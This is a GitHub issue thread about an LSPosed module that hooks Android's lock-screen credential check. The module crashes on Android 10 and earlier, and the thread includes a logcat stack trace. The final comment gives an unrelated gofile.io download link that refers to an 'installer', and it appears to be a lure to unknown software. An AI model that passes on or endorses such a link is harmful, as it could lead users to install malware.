### ISSUE TITLE
Backward compatibility for <= Android 10

### ISSUE THREAD

**Issue by leohearts** [leohearts/AlternativeUnlockXposed#7]
Currently this app doesn't work with <=Android 10, because [lock screen code](https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/com/android/internal/widget/LockPatternUtils.java;l=512;drc=3c2434a039edd69287d90bd63075c2e5a5a1c350;bpv=1;bpt=0) has changed after 2020.

If anyone want support on and before Android 10, please leave a reply and let me know how many users want to use this module on and before Android 10.

```logcat
09-04 21:07:30.824  7347  7430 I alternativeUnlockHook: beforeHookedMethod: Hooked checkCredential
09-04 21:07:30.824  7347  7430 D alternativeUnlockHook: Cred: class java.lang.Integer
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge: java.lang.NoSuchMethodError: [B#getCredential()
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at v.s.IHR.hMBtep.S.uI.PP.XposedHelpers.lambda$findMethodBestMatch$5(Unknown Source:6)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at v.s.IHR.hMBtep.S.uI.PP.XposedHelpers.f(Unknown Source:0)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at v.s.IHR.hMBtep.S.uI.PP.c.get(Unknown Source:8)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at java.util.Optional.orElseThrow(Optional.java:286)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at v.s.IHR.hMBtep.S.uI.PP.XposedHelpers.findMethodBestMatch(SourceFile:1)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at v.s.IHR.hMBtep.S.uI.PP.XposedHelpers.findMethodBestMatch(SourceFile:3)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at v.s.IHR.hMBtep.S.uI.PP.XposedHelpers.callMethod(SourceFile:2)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at com.leohearts.alternativeUnlockHook.HookClass$1.beforeHookedMethod(HookClass.java:76)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at v.s.IHR.hMBtep.S.uI.PP.XposedBridge$LegacyApiSupport.handleBefore(Unknown Source:24)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at J.callback(Unknown Source:179)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at LSPHooker_.checkCredential(Unknown Source:28)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at com.android.internal.widget.LockPatternUtils.checkPassword(LockPatternUtils.java:543)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at com.android.internal.widget.LockPatternChecker$5.doInBackground(LockPatternChecker.java:277)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at com.android.internal.widget.LockPatternChecker$5.doInBackground(LockPatternChecker.java:271)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at android.os.AsyncTask$3.call(AsyncTask.java:378)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at android.os.AsyncTask$SerialExecutor$1.run(AsyncTask.java:289)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1167)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:641)
09-04 21:07:30.824  7347  7430 E LSPosed-Bridge:        at java.lang.Thread.run(Thread.java:919
```

**Comment by gabriel-mauricioo** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
